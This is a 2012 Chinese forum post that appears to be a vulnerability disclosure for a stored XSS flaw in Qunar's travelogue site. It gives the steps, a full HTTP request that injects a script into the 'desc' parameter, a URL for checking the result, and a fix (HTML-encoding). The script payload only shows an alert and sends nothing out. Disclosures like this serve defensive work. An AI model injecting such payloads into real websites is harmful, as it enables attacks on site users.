灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:2059回复:0

去哪儿一处存储型XSS漏洞

楼主#
更多 发布于:2012-11-09 18:04
在旅途频道,1、发表一篇游记
2、添加一批图片
3、在图片下方插入文本
4、截包修改,desc参数存在问题。如下:

GET /mobile_ugc/web/editMiniPic.htm?picId=80371;desc=<script>if(location.hash!%3D"")alert(location.hash)</script>;random=1348498825316 HTTP/1.1
Host: lvtu.qunar.com
Proxy-Connection: Keep-Alive
Cookie: ……


访问该地址看效果
http://lvtu.qunar.com/mobile_ugc/web/album.htm?albumId=4228#aaa


图片:20121109111255290.jpg





修复方案:

对desc参数进行html编码


喜欢0 评分0
游客

返回顶部